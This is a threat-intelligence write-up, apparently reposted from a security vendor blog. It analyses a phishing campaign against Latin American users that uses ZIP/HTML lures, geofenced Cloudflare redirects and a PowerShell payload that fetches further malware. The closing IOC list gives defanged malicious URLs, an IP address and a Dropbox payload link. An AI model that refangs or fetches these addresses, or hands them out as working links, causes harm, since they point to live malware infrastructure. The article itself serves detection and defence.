cyware: Phishing Deception – Suspended Domains Reveal Malicious Payload for Latin American Region

Summary: This article discusses a recent phishing campaign targeting the Latin American region. The campaign involves phishing emails with ZIP file attachments that lead to malicious file downloads posing as invoices.

Threat Actor: Unknown | Unknown
Victim: Latin American region | Latin American region

Key Point :

  • The phishing campaign involves emails with ZIP file attachments that contain HTML files leading to malicious file downloads.
  • The email headers use the domain ‘temporary[.]link’ and the User-Agent Roundcube Webmail, which are often abused in phishing activity.
  • The phishing emails use concatenated URLs and the extracted HTML files contain malicious URLs.
  • The malicious URLs redirect to a suspended page or a Cloudflare captcha page for human verification.
  • The campaign uses newly created domains hosted on an IP address and some of the domains have contacts in Mexico.
  • The malicious payload includes a PowerShell script that checks the victim’s machine for information and presence of antivirus products.
  • The PowerShell script contains base64 encoded strings that decode to URLs for further malicious downloads.
  • One of the decoded URLs leads to a ZIP file download containing suspicious files, including an executable AutoIt file.

Recently, we observed a phishing campaign targeting the Latin American region. The phishing email contained a ZIP file attachment that when extracted reveals an HTML file that leads to a malicious file download posing as an invoice.

Figure 1. Phishing email sample with zip file attachment

Figure 1. Phishing email sample with zip file attachment

Upon checking the email header, we see that it has an email address format that uses the domain ‘temporary[.]link’. We also saw the usage of Roundcube Webmail in User-Agent in the email header which is also often abused in phishing activity.

Figure 1.2. Email Header of the phishing email

Figure 1.2. Email Header of the phishing email

 

In this sample the attached HTML file contains a concatenated URL.

Figure 2

Figure 2. Snippet of the source-code of the HTML file with concatenated URL

Normally, accessing the given URL will lead to a suspended page.

Figure 3. Suspended page when access in a different region

Figure 3. Suspended page when access in a different region

 

Upon doing further research on the URL involved, it seems to be hosted on an IP 89[.]116[.]32[.]138 based on our internal telemetry.

Figure 4. List of domains hosted on IP 89[.]116[.]32[.]138

Figure 4. List of domains hosted on IP 89[.]116[.]32[.]138

 

These domains are newly created being about one year old, name servers are under Cloudflare, and some of the domains contact registrant are in Mexico.

Figure 5. The domain information from whois[.]com

Figure 5. The domain information from whois[.]com

 

However, if the URL is accessed using a Mexico-based IP it will redirect to a captcha page for human verification which leads to another URL hxxps[://]facturas[.]co[.]in/index[.]php?va that will download a malicious RAR file.

Figure 6. URL Redirection to Cloudflare captcha page when accessed using a Mexico based IP

Figure 6. URL Redirection to Cloudflare captcha page when accessed using a Mexico based IP

 

Figure 7  

Figure 7. Extracted malicious batch file with malicious URL connection

 

Upon checking, the RAR file contains a malicious payload. This is a PowerShell script that will check the victim’s machine for information like computer name, operating system, etc. It will also check for the presence of an antivirus product.

We also observed several base64 encoded strings in the script. One of them when decoded contains another URL request that uses the ‘Post’ method for the URL response.

Figure 8. Snippet of the code with base64 string encoded strings

Figure 8. Snippet of the code with base64 string encoded strings

 

The decoded URL hxxp[://]86[.]38[.]217[.]167/ps/index[.]php will check for the user’s country.

Figure 9. The feedback when URL

Figure 9. The feedback when URL hxxp[://]86[.]38[.]217[.]167/ps/index[.]php was accessed

 

Another notable base64 encoded string contains a malicious URL that will download a malicious ZIP file.

Figure 9.1

Figure 9.1 Snippet of the code with base64 string encoded strings that contains another malicious URL download

 

The malicious URL decoded was hxxps[://]www[.]dropbox[.]com/scl/fi/k6hxua7lwt1qcgmqou6q3/m[.]zip?rlkey=7wu6x4pfvbt64atx11uqpk34l&dl=1. Downloading and extracting the ZIP file revealed a lot of many highly suspicious files. Some files were newly modified, while others were quite old with the last being modified in 2016. One of the listed files was also an executable AutoIt file. This campaign’s characteristics are quite similar to those observed in previous “Horabot” campaigns .

   Figure 10

Figure 10. Extracted ZIP file with suspicious executable AutoIt file

Conclusion

Understandably, from the threat actors’ point of view, phishing campaigns always try different to hide any malicious activity and avoid immediate detection. To do so some phishing emails may now include compressed file attachments, obfuscated code or even PowerShell scripts that often lead to malware download. Using newly created domains and making them accessible only in specific countries is another evasion technique. especially if the domain behaves differently depending on their target country.

Also, please remember t’s very important to be very wary with emails that contain file attachments or URLs pretending to be inaccessible or suspended page as sometimes they may actually lead to more malicious threats.

IOCs:

hxxps[://]facturasmex[.]cloud

hxxps[://]facturas[.]co[.]in/index[.]php?va

hxxp[://]ad2[.]gotdns[.]ch/22/22

hxxp[://]86[.]38[.]217[.]167/ps/index[.]php

hxxps[://]www[.]dropbox[.]com/scl/fi/k6hxua7lwt1qcgmqou6q3/m[.]zip?rlkey=7wu6x4pfvbt64atx11uqpk34l&dl=1

References

https://whois.com

https://blog.talosintelligence.com/new-horabot-targets-americas/

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/phishing-deception-suspended-domains-reveal-malicious-payload-for-latin-american-region/


“An interesting youtube video that may be related to the article above”